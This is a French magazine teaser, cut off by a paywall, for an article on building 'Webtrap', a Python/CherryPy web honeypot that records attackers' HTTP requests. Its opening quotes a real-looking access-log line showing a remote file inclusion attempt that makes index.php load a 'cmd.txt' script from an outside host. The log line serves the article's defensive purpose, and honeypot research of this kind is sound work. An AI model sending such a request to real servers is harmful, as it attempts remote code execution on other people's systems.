Un web honeypot avec cherrypy

Magazine
Marque
GNU/Linux Magazine
Numéro
113
Mois de parution
février 2009


Résumé
Combien d’administrateurs système n'ont jamais vu leurs logs de serveur web polués par des requêtes HTTP moisies qui visent à exploiter des failles web sur des pages inexistantes ? Très peu, je pense. Cet article explique l'écriture d'un outil, appelé « web honeypot », qui va permettre de capturer toutes les requêtes invalides afin de les analyser et de répondre en conséquence. Ceci permettra de comprendre les intentions des pirates et, qui sait, peut-être de trouver des failles web encore méconnues du grand public (c'est beau de rêver).

69.9.37.130 - - [22/Feb/2008:00:44:05 +0100] "GET /index.php?x=http://www.hackergroup.altervista.org/cmd.txt?? HTTP/1.1" 200 2431

Cet article couvre l'écriture d'une application web, appelée « Webtrap » et écrite en Python. Cette application permet d'émuler d'autres applications web vulnérables afin de capturer toutes les tentatives d'attaques visant ces dernières. L'article commence par une présentation de Webtrap, introduit ensuite le framework de développement Cherrypy pour finir par décrire les étapes de l'écriture de Webtrap.

1. Présentation de Webtrap

1.1 Historique

La première version de Webtrap est née en 2006 lors d'un projet tuteuré de DUT [1]. Écrite en PHP, cette version avait pour but, à court terme, de récolter des statistiques sur les failles web les plus exploitées par les pirates et sur les sites vulnérables. À long terme, cette version a permis l'infiltration de quelques botnets [2] grâce aux scripts qui ont été récupérés.

1.2...

Cet article est réservé aux abonnés. Il vous reste 94% à découvrir.
S'abonner à Connect
  • Accédez à tous les contenus de Connect en illimité
  • Découvrez chaque semaine un nouvel article premium
  • Consultez les nouveaux articles en avant-première
Je m'abonne


Article rédigé par

Par le(s) même(s) auteur(s)

Netusse, fuzzer de noyaux depuis 2006

Magazine
Marque
MISC
Numéro
64
Mois de parution
novembre 2012
Spécialité(s)
Résumé

Netusse est un fuzzer de sockets qui casse des noyaux depuis 2006. Cet exploit corner commence par décrire l'histoire et le fonctionnement interne de netusse puis présente quelques vulnérabilités intéressantes trouvées avec ce fuzzer et termine enfin par l'exploitation d'une de ces vulnérabilités sur OpenBSD.

OSSEC, un HIDS qui fait le café

Magazine
Marque
GNU/Linux Magazine
Numéro
128
Mois de parution
juin 2010
Résumé
Tripwire, AIDE, Samhain sont des noms dont vous avez déjà sûrement entendu parler. En effet, ceux sont les trois « Host based Intrusion Detection System » (HIDS) libres les plus répandus, qui sont mentionnés à chaque article traitant de sécurité. Le problème de ces trois HIDS est qu'ils se limitent uniquement à vérifier l'intégrité de certains fichiers de la machine qu'ils protègent et cela n'est bien évidemment pas suffisant. Ainsi, on retrouve généralement en plus de ces outils, des programmes comme rkhunter ou logcheck pour détecter la présence de rootkits sur le système et détecter des comportements étranges à travers l'analyse des logs, deux choses que ces trois HIDS ne sont pas capables de faire. Dans cet article, nous verrons qu'il existe un HIDS libre qui remplit toutes les fonctionnalités nécessaires pour protéger efficacement une ou un ensemble de machines. Cet HIDS se nomme OSSEC.

Les derniers articles Premiums

Les derniers articles Premium

Du graphisme dans un terminal ? Oui, avec sixel

Magazine
Marque
Contenu Premium
Spécialité(s)
Résumé

On le voit de plus en plus, les outils en ligne de commandes s'étoffent peu à peu d'éléments graphiques sous la forme d'émojis UTF8. Plus qu'une simple décoration, cette pointe de « graphisme » dans un monde de texte apporte réellement un plus en termes d'expérience utilisateur et véhicule, de façon condensée, des informations utiles. Pour autant, cette façon de sortir du cadre purement textuel d'un terminal n'est en rien une nouveauté. Pour preuve, fin des années 80 DEC introduisait le VT340 supportant des graphismes en couleurs, et cette compatibilité existe toujours...

Game & Watch : utilisons judicieusement la mémoire

Magazine
Marque
Contenu Premium
Spécialité(s)
Résumé

Au terme de l'article précédent [1] concernant la transformation de la console Nintendo Game & Watch en plateforme de développement, nous nous sommes heurtés à un problème : les 128 Ko de flash intégrés au microcontrôleur STM32 sont une ressource précieuse, car en quantité réduite. Mais heureusement pour nous, le STM32H7B0 dispose d'une mémoire vive de taille conséquente (~ 1,2 Mo) et se trouve être connecté à une flash externe QSPI offrant autant d'espace. Pour pouvoir développer des codes plus étoffés, nous devons apprendre à utiliser ces deux ressources.

Abonnez-vous maintenant

et profitez de tous les contenus en illimité

Je découvre les offres

Déjà abonné ? Connectez-vous